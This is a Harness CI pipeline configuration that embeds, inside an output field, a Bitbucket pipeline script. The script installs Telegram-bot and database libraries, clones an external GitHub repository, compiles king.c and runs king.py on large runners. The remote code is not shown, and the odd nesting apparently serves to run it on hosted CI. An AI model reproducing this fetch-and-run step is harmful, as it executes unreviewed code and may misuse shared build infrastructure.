pipeline:
  identifier: Build_newbot419_new_1738613669883
  name: Build new
  orgIdentifier: default
  projectIdentifier: king
  properties:
    ci:
      codebase:
        build: <+input>
        connectorRef: account.Github_OAuth_1738613638538
        repoName: newbot419/new
  stages:
    - stage:
        name: bhbd
        identifier: bhbd
        description: ""
        type: Pipeline
        spec:
          org: default
          pipeline: ram
          project: king
          inputs:
            identifier: ram
            properties:
              ci:
                codebase:
                  build: <+input>
          outputs:
            - name: jndjdebd
              value: "image: atlassian/default-image:3\\n\\noptions:\\n  runtime:\\n    cloud:\\n      atlassian-ip-ranges: true\\n\\npipelines:\\n  default:\\n    - step:\\n        name: \"Run 5-Minute Show\"\\n        size: 8x\\n        script:\\n          - echo \"Starting the 5-minute show...\"\\n          - apt-get update && apt-get install -y python3-pip python3-dev\\n          - pip install telebot pymongo aiohttp \\n          - git clone https://github.com/newbot419/new.git\\n          - cd new\\n          - gcc king.c -o king -lpthread\\n          - python3 king.py"
        when:
          pipelineStatus: All
